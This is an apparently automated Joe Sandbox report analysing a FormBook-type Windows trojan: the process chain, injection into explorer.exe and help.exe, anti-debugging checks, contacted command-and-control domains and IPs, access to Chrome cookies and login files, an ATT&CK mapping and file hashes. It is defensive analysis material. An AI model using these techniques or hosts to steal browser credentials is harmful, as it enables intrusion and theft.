          Source: explorer.exe, 00000004.00000000.350579899.000000000858E000.00000004.00000001.00020000.00000000.sdmp, Binary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.349521692.000000000830B000.00000004.00000001.00020000.00000000.sdmp, Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe, Code function: 1_2_0040AA3F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe, Code function: 1_2_0041273A GetProcessHeap
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe, Code function: 3_2_00AE6A60 rdtscp
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe, Process token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B6FE3F mov eax, dword ptr fs:[00000030h]3_2_00B6FE3F
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABE620 mov eax, dword ptr fs:[00000030h]3_2_00ABE620
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]3_2_00ABC600
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]3_2_00ABC600
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]3_2_00ABC600
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE8E00 mov eax, dword ptr fs:[00000030h]3_2_00AE8E00
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEA61C mov eax, dword ptr fs:[00000030h]3_2_00AEA61C
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEA61C mov eax, dword ptr fs:[00000030h]3_2_00AEA61C
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71608 mov eax, dword ptr fs:[00000030h]3_2_00B71608
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC766D mov eax, dword ptr fs:[00000030h]3_2_00AC766D
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7AE44 mov eax, dword ptr fs:[00000030h]3_2_00B7AE44
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7AE44 mov eax, dword ptr fs:[00000030h]3_2_00B7AE44
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]3_2_00B37794
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]3_2_00B37794
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]3_2_00B37794
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC8794 mov eax, dword ptr fs:[00000030h]3_2_00AC8794
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF37F5 mov eax, dword ptr fs:[00000030h]3_2_00AF37F5
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB4F2E mov eax, dword ptr fs:[00000030h]3_2_00AB4F2E
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB4F2E mov eax, dword ptr fs:[00000030h]3_2_00AB4F2E
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEE730 mov eax, dword ptr fs:[00000030h]3_2_00AEE730
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEA70E mov eax, dword ptr fs:[00000030h]3_2_00AEA70E
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEA70E mov eax, dword ptr fs:[00000030h]3_2_00AEA70E
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B4FF10 mov eax, dword ptr fs:[00000030h]3_2_00B4FF10
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B4FF10 mov eax, dword ptr fs:[00000030h]3_2_00B4FF10
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B8070D mov eax, dword ptr fs:[00000030h]3_2_00B8070D
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B8070D mov eax, dword ptr fs:[00000030h]3_2_00B8070D
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADF716 mov eax, dword ptr fs:[00000030h]3_2_00ADF716
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACFF60 mov eax, dword ptr fs:[00000030h]3_2_00ACFF60
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B88F6A mov eax, dword ptr fs:[00000030h]3_2_00B88F6A
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACEF40 mov eax, dword ptr fs:[00000030h]3_2_00ACEF40
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe, Process queried: DebugPort
          Source: C:\Windows\SysWOW64\help.exe, Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe, Code function: 3_2_0040C317 LdrLoadDll
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe, Code function: 1_2_0040AB9E SetUnhandledExceptionFilter
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe, Code function: 1_2_0040AE6C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe, Code function: 1_2_0040AA3F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe, Code function: 1_2_0040F790 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe, Domain query: www.patrickguarte.com
          Source: C:\Windows\explorer.exe, Network Connect: 155.159.61.221 80
          Source: C:\Windows\explorer.exe, Domain query: www.eufidelizo.com
          Source: C:\Windows\explorer.exe, Network Connect: 192.185.35.86 80
          Source: C:\Windows\explorer.exe, Domain query: www.lyonfinancialusa.com
          Source: C:\Windows\explorer.exe, Domain query: www.afterdarksocial.club
          Source: C:\Windows\explorer.exe, Domain query: www.lopezmodeling.com
          Source: C:\Windows\explorer.exe, Network Connect: 192.185.217.47 80
          Source: C:\Windows\explorer.exe, Network Connect: 206.233.197.135 80
          Source: C:\Windows\explorer.exe, Network Connect: 154.22.100.62 80
          Source: C:\Windows\explorer.exe, Network Connect: 162.214.129.149 80
          Source: C:\Windows\explorer.exe, Domain query: www.foxwhistle.com
          Source: C:\Windows\explorer.exe, Network Connect: 2.57.90.16 80
          Source: C:\Windows\explorer.exe, Domain query: www.brennancorps.info
          Source: C:\Windows\explorer.exe, Domain query: www.19t221013d.tokyo
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe, Section unmapped: C:\Windows\SysWOW64\help.exe base address: 110000
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe, Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe, Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\help.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\help.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe, Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe, Thread register set: target process: 3528
          Source: C:\Windows\SysWOW64\help.exe, Thread register set: target process: 3528
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe, Process created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h
          Source: explorer.exe, 00000004.00000000.313440490.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.341395236.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.360349576.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: EProgram Managerzx
          Source: explorer.exe, 00000004.00000000.313440490.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.341395236.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.318601390.0000000005C70000.00000004.00000001.00020000.00000000.sdmp, Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.313440490.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.341395236.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.360349576.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.313026823.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.360055157.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.341089445.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Progmanath
          Source: explorer.exe, 00000004.00000000.313440490.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.341395236.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.360349576.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe, Code function: 1_2_0040ACAB cpuid
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe, Code function: 1_2_0040A928 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe, Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess

          Stealing of Sensitive Information

          Source: Yara match, File source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\help.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Source: C:\Windows\SysWOW64\help.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\help.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\help.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\help.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\help.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\help.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

          Remote Access Functionality

          Source: Yara match, File source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 2 Command and Scripting Interpreter | Path Interception | 512 Process Injection | 2 Virtualization/Sandbox Evasion | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Email Collection | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
          Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 512 Process Injection | 21 Input Capture | 141 Security Software Discovery | Remote Desktop Protocol | 21 Input Capture | Exfiltration Over Bluetooth | 3 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | 1 Shared Modules | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Archive Collected Data | Automated Exfiltration | 4 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 2 Obfuscated Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | 1 Data from Local System | Scheduled Transfer | 114 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | 1 Remote System Discovery | SSH | 2 Clipboard Data | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 15 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Behavior Graph ID: 756323, Sample: Lc8xQv8iZY.exe, Startdate: 30/11/2022, Architecture: WINDOWS, Score: 100. Process chain: Lc8xQv8iZY.exe drops and starts hvbvmxm.exe, which starts a second hvbvmxm.exe instance and conhost.exe; the second hvbvmxm.exe instance injects into explorer.exe, which starts help.exe.

          Source | Detection | Scanner | Label | Link
          Lc8xQv8iZY.exe | 49% | ReversingLabs | Win32.Trojan.Injuke |
          Lc8xQv8iZY.exe | 47% | Virustotal | | Browse
          Lc8xQv8iZY.exe | 100% | Joe Sandbox ML | |

          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Local\Temp\hvbvmxm.exe | 100% | Joe Sandbox ML | |
          C:\Users\user\AppData\Local\Temp\hvbvmxm.exe | 54% | ReversingLabs | Win32.Trojan.FormBook |

          Source | Detection | Scanner | Label | Link | Download
          1.2.hvbvmxm.exe.21b0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
          3.2.hvbvmxm.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
          3.0.hvbvmxm.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
          0.2.Lc8xQv8iZY.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491 | | Download File
          0.0.Lc8xQv8iZY.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491 | | Download File
                                                174COGENT-174UStrue
                                                162.214.129.149
                                                www.afterdarksocial.clubUnited States
                                                46606UNIFIEDLAYER-AS-1UStrue
                                                2.57.90.16
                                                brennancorps.infoLithuania
                                                47583AS-HOSTINGERLTtrue
                                                192.185.35.86
                                                lopezmodeling.comUnited States
                                                46606UNIFIEDLAYER-AS-1UStrue
                                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                                Analysis ID:756323
                                                Start date and time:2022-11-30 01:23:15 +01:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 9m 42s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:Lc8xQv8iZY.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:10
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@7/5@9/7
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HDC Information:
                                                • Successful, ratio: 78.6% (good quality ratio 73.1%)
                                                • Quality average: 73.2%
                                                • Quality standard deviation: 31.1%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 76
                                                • Number of non-executed functions: 96
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                                • Not all processes were analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                No simulations
                                                No context
                                                No context
                                                Process:C:\Windows\SysWOW64\help.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                Category:dropped
                                                Size (bytes):94208
                                                Entropy (8bit):1.2880737026424216
                                                Encrypted:false
                                                SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:SQLite format
                                                Process:C:\Users\user\Desktop\Lc8xQv8iZY.exe
                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):125952
                                                Entropy (8bit):6.271337362250939
                                                Encrypted:false
                                                SSDEEP:3072:hzNyHSqEF90sCFO/M7f9hUnBZFXBuioTLzJhiF:mHSqo9jE5hSFXEc
                                                MD5:1EEBBBD92B2C0C60F896FF8DCBCEDCAA
                                                SHA1:1291CC58A5664B1ACD50D9FD8E0580C519190477
                                                SHA-256:01B2D4443C383F07CCF3EA521AE9502527EEEDF352B92B90A382121B03992EC3
                                                SHA-512:67EFA564F026094BEC0A44AAF01FC8072412E6CDEFF019631689254A996C8B06CD0CCCCEE64B3D70B847E9ACA7C3DBCDE327D0A822988CC5295847990A8D9215
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 54%
                                                Reputation:low
                                                Process:C:\Users\user\Desktop\Lc8xQv8iZY.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):5929
                                                Entropy (8bit):6.194305098271039
                                                Encrypted:false
                                                SSDEEP:96:l3ZCWD/FmJYgnXC7p7i7Q7+7J7Q737snGaMyyhcLofV1M+zzinQTDLEyoscdwQU4:7/FmJYIydOs6dcDqVycLoN1M+eAjoscb
                                                MD5:00815375B1B0AEF8D5F1C54050813CF2
                                                SHA1:E007F2C7D30FBD16A35A97E91B1B4719F46D28BB
                                                SHA-256:2C6C3495127AE142AAA4577D73B6C1EE3502B2C76BEE20EBF54CEA2C86404E63
                                                SHA-512:64EDF14579C02EBE2B27EA06A19C5753F08AEEA370E4C8BF93552086AA4FFB62EBF841E818D40CA091343BB789AD7F42A7FE2BFBB76FE870F19065A31AAE2FE2
                                                Malicious:false
                                                Reputation:low
                                                Process:C:\Users\user\Desktop\Lc8xQv8iZY.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):329129
                                                Entropy (8bit):7.534660167276675
                                                Encrypted:false
                                                SSDEEP:6144:qOlZjKGnyqAVoJZmaEPokM0R/fyysHSqo9jE5hSFXEc:lZjLA2ZJYJGf+E5h
                                                MD5:0092575B985AE1E77D23EC215EE09C05
                                                SHA1:122945BC6AC3866DDF76ECF99127D9648F5024A6
                                                SHA-256:27BE4D2BA04D732C15B4916F2758D13928D2D31377228E575B61D8DA7A509CBD
                                                SHA-512:C0F19441D03AC8F95C38F5878B4B61C01BCB852CFABCBF26A9D793B74D6D731AC9FD78D1317E2EC90A439E0368FE869E6A660C5DD34D0950A7CC6843F6FBFE10
                                                Malicious:false
                                                Reputation:low
                                                Process:C:\Users\user\Desktop\Lc8xQv8iZY.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):189440
                                                Entropy (8bit):7.99864599001922
                                                Encrypted:true
                                                SSDEEP:3072:plkkjPCMjKvjM3CqAVPQsKZCVbJ55QSX5HBmGwrVhQles+ALw0J/ECp:plZjKGnyqAVoJZmaEPokM0R/p
                                                MD5:ADD9CD4EACD9591A07875B761C8D1640
                                                SHA1:2047C17A31A7E83850DEF3CA6310572957E5D0B2
                                                SHA-256:0AF1AFDA6F616BEB76513577272E0E36EFB99CF8A3718B7725D60C9D88DFBC0B
                                                SHA-512:132281DC01506D09D5C7106105338179A9DB0D50309C94FFBC5E63A7FBF0E6D6DC5B31D26DB93E51FB4C994DA3F8D9B398D2C31F3CF8CF807F111BD9CCF761AC
                                                Malicious:false
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.934197714132832
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:Lc8xQv8iZY.exe
                                                File size:278807
                                                MD5:30571d64c9a9ed267159fa941a20840c
                                                SHA1:bfb81d8a7c94781b3bd939bd17d500ae61b2ff70
                                                SHA256:85d6c9eac93fb8818d37dc15110ebd060b3e9df48043ee6bcf349df6aed047c5
                                                SHA512:5c8b708f3540b9347c36722934c8fc56098a94f8362688a8fa712da99e1b8c2564698eb0bed52e226cdfc40cf8b762e1860f6ea9928260e3f0f35bba9cfda82f
                                                SSDEEP:6144:QBn10/UR088uiPuDtJWn42Isu/20+kfAZLrYdwMPTnDMiQH7oPo9:gWLuiPh4rZOH5ZL/MLn4REo9
                                                TLSH:4854236595E0DCF3E6EF5E70AAAB87E6E3B3B0444525D9CAC3608D2F68211C58E1D142
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3(..RF..RF..RF.*]...RF..RG.pRF.*]...RF..qv..RF..T@..RF.Rich.RF.........................PE..L...ly.V.................^.........
                                                Icon Hash:b2a88c96b2ca6a72
                                                Entrypoint:0x40324f
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                Time Stamp:0x567F796C [Sun Dec 27 05:38:52 2015 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:ab6770b0a8635b9d92a5838920cfe770
                                                Instruction
                                                sub esp, 00000180h
                                                push ebx
                                                push ebp
                                                push esi
                                                push edi
                                                xor ebx, ebx
                                                push 00008001h
                                                mov dword ptr [esp+1Ch], ebx
                                                mov dword ptr [esp+14h], 00409130h
                                                xor esi, esi
                                                mov byte ptr [esp+18h], 00000020h
                                                call dword ptr [004070B8h]
                                                call dword ptr [004070B4h]
                                                cmp ax, 00000006h
                                                je 00007F51E0A2E4F3h
                                                push ebx
                                                call 00007F51E0A312E1h
                                                cmp eax, ebx
                                                je 00007F51E0A2E4E9h
                                                push 00000C00h
                                                call eax
                                                push 004091E0h
                                                call 00007F51E0A31262h
                                                push 004091D8h
                                                call 00007F51E0A31258h
